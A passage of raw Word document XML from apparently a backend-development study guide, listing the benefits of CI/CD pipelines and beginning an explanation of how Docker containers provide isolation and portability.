          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CI/CD pipelines ensure that the deployment process is consistent across different environments (e.g., development, staging, production). Automation reduces the risk of human error and makes deployments more reliable and predictable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F95758A" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improved Collaboration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CAE6CD" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CI/CD encourages better collaboration between development, testing, and operations teams. Since the pipeline integrates and tests code continuously, it facilitates early detection of integration issues and enhances cross-team communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A05451A" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738CF63" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>As the development team grows, CI/CD pipelines scale to accommodate more frequent commits, builds, and deployments. Automated pipelines handle complex workflows and large-scale deployments efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6978D3BE" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reduced Time to Market:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B600480" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CI/CD accelerates the entire SDLC, allowing new features, bug fixes, and updates to be delivered to customers more quickly. Faster releases provide a competitive advantage and enable more responsive product development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D999299" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>High Code Quality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5799A0DE" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The pipeline enforces code quality through automated testing, code reviews, static analysis, and other quality gates. This ensures that only code that meets predefined standards is deployed to production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBD41B6" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DevOps Culture and Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668EAD85" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CI/CD is a fundamental practice in DevOps, promoting a culture of collaboration, continuous improvement, and automation. It bridges the gap between development and operations teams, aligning them toward common goals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0E2DBE" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049D4164" w14:textId="7DD2B87D" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc178383360"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain how Docker containers provide isolation and portability for backend applications.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
    </w:p>
    <w:p w14:paraId="693C7D9E" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker containers are a popular tool for packaging and deploying applications in a consistent, isolated, and portable environment. They provide significant benefits, particularly for backend applications, by ensuring that they run the same way regardless of where they are deployed. Here’s how Docker containers provide isolation and portability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABFE19" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713FEDE7" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker containers achieve isolation through the following mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C96BB8B" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Process Isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA58A73" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Each Docker container runs as an isolated process on the host operating system. Containers share the same OS kernel but are otherwise isolated from each other. This isolation is achieved using Linux kernel features like namespaces and cgroups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BD5E81" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Namespaces:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provide separate instances of system resources (e.g., process IDs, network interfaces, and user IDs) for each container, ensuring that processes inside a container cannot see or interact with processes outside of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF571A" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Control Groups (cgroups):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Limit and isolate the resource usage (CPU, memory, I/O) of each container, preventing one container from affecting the performance of others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D4AED" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>File System Isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D02EB5" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker uses a layered file system and provides each container with its own file system (referred to as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>container image</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>). This file system is isolated from the host’s file system and other containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C899A" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Changes made within a container, such as writing to files, do not affect the host or other containers. Once a container is deleted, all changes to its file system are also removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B57CD76" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Network Isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6271ECA6" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>By default, containers are isolated at the network level. Docker creates virtual networks for containers, allowing them to communicate with each other as needed while remaining isolated from external networks or other containers not on the same network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479092C4" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Containers can be assigned unique IP addresses and can communicate via specific ports, but they do not have direct access to the host’s network unless explicitly configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B49B7" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Portability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1927A329" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker containers provide portability in the following ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB1FC8" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consistent Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEF04DC" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Containers encapsulate the entire runtime environment, including the application code, dependencies, libraries, configuration files, and environment variables. This ensures that the application behaves the same way regardless of where the container runs (e.g., development, testing, production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9A5784" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Developers can create and test an application in a container on their local machine, and then deploy the same container image to different environments (on-premises, cloud, etc.) without worrying about differences in underlying infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1C5CDD" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
